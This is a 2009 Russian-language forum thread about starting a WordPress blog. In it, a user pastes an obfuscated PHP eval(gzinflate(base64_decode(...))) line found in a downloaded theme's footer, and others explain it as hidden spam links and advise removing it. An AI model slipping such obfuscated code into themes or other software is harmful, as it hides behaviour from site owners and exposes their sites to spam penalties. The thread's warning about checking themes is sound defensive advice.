Перейти к содержимому

Создание блога

#1 Bender

Bender
  • Неактивные
  • 712 сообщений
0

Отправлено 08 Январь 2009 - 22:03

В общем вот я решил создать свой блог.
И тему это создал чтоб было где задавать вопросы. Пришла мне это идея в голову когда я понял что чтобы продвинуть сайт так, чтобы радоваться отдаче (адсенсу), нужно много денег, которых у меня нет. А в блогуне за посты платят конкретные деньги в конкретное время.

Я так подумал и решил что мне самому будет нравиться вести блог на интересную мне тему. Тему я выбрал Работа в интернете, т.к. ей я щас интересуюсь у деляю большуе часть времени. Но только я там не буду писать что я лучший сеошник и зарабатываю много... , а буду писать свою историю, наблюдения, мнения и впечатления... в общем правду, ни капли лжи. Наверное буду делать только посты, ИМХО - всякие обзоры замусорят блог (если я не прав - отпишитесь).

Итак первый вопрос:
Какой выбрать движек? Скорее всего посоветуете вордпрес - какую версию и (если можно) ссылку.
(Знаю что ответов на этот вопрос в инете полно, но всеже хотелось бы чтобы мне ответили Вы)

• 0

robot

robot
  • Пользователь PRO
  • 2 652 сообщений
Советую обратить внимание на следующее:
  1. Алгоритм создания нового блога
  2. Cоздание блога на Joomla!
  3. Wordpress НЕ только для блога или создание различных типов сайтов на этой CMS
  4. Как бесплатно создать блог
  5. Полное руководство по созданию полноценного блога

#2 admin

admin
  • Пользователь PRO
  • 5 275 сообщений

Отправлено 08 Январь 2009 - 22:30

Вордпресс последней версии ставьте только, а скачать можно например с _http://mywordpress.ru/
  • 0

#3 Bender

Bender
    Topic Starter
  • Неактивные
  • 712 сообщений

Отправлено 08 Январь 2009 - 22:48

Ссылка не работает
  • 0

#4 admin

admin
  • Пользователь PRO
  • 5 275 сообщений

Отправлено 08 Январь 2009 - 22:55

WordPress-Russia.org — Команда официальной русской локализации

Взял с википедии... :)
  • 0

#5 Galeodor

Galeodor
  • Неактивные
  • 1 172 сообщений

Отправлено 08 Январь 2009 - 23:00

lecactus.ru

отсюда качай =) там руссифицированная, и баги убраны.
  • 0

#6 Bender

Bender
    Topic Starter
  • Неактивные
  • 712 сообщений

Отправлено 13 Январь 2009 - 13:51

Учтановил, нашел интересную тему, но ее автор в подвал нагло напихал ссылок и фаил подвала выглядит не как все а вот так
<? eval(gzinflate(base64_decode('
bZCxisMwEERrG/wPgz8g6o2iwDV3XZpAajla24tt
SScpEQf5+MjxlRm2WGbYB7MnVRVBGn6AzbEdnEsU
WtXUKCO9gqHIoyWD/q+D1JgCDcd2Ssl3QuScD6ue
6ffOt/lwc2urznZhS7hSHzkRvu68GApSaAVtzWdE
pn5yMbEdR6I57qBCwM/uYjv/3iI8oR+aF90vhCEQ
QacOF+c/YZPz2aeJVvpH4uqC8YFixOVtb1wpSsum
lqL8oPRu6qrad7xVktML
'))); ?>
Что это такое я не знаю, но если все это стереть и сохранить то вроде все пашет. Не будет ли из-за этого осложнений, не будет ли движек тупить и долго думать?
  • 0

#7 ilyazh

ilyazh
  • Неактивные
  • 356 сообщений

Отправлено 13 Январь 2009 - 14:13

Удаляйте нафиг!! А то в бан попадёте. Это ссылки скрытые на сайт разработчика. Если удалите - будет только лучше.
з.ы. Всегда когда качаете тему, а не делаете сами - проверяйте на наличие в ней вот такой херни.

• 0

#8 Bender

Bender
    Topic Starter
  • Неактивные
  • 712 сообщений

Отправлено 13 Январь 2009 - 15:26

Так и сделал - удалил.

1) А за что в бан попасть можно? Ссылки на странице видны, написаны читаемым текстом...

2) Я так понимаю на wordpress.org ccылку поставить нужно?
  • 0

#9 ilyazh

ilyazh
  • Неактивные
  • 356 сообщений

Отправлено 13 Январь 2009 - 15:51

1) Ну видны, а сколько ещё не видны? Даже если всё по честному, то я бы убрал. Ибо если бы человек сделал нормальным хтмл кодом, то я бы оставил, если тема бесплатная. Но человек сделал по хитрому, в расчёте на то, что все такие дурачки =) Короче ссылки "умников" я удаляю даже не думаю. Бан можно получить за спам т.к. неизвестно сколько ссылок (1 показана, а сколько скрытых? Может быть сотни) и с каким анкором идёт с вашего блога на сайт автора.

2) Если хотите, то ставьте, а если нет, то не надо. Вордпресс бесплатный движок и распространяется бесплатно и ссылку размещать вы не обязаны. Т.е. по желанию
  • 0

#10 Bender

Bender
    Topic Starter
  • Неактивные
  • 712 сообщений

Отправлено 13 Январь 2009 - 16:22

Бан можно получить за спам т.к. неизвестно сколько ссылок (1 показана, а сколько скрытых? Может быть сотни) и с каким анкором идёт с вашего блога на сайт автора.

Не знал что такое бывает ;) А как можно проверить, может у меня еще такие ссылки есть?
  • 0

robot

robot
  • Пользователь PRO
  • 2 652 сообщений

Оформление форума – IPBSkins.ru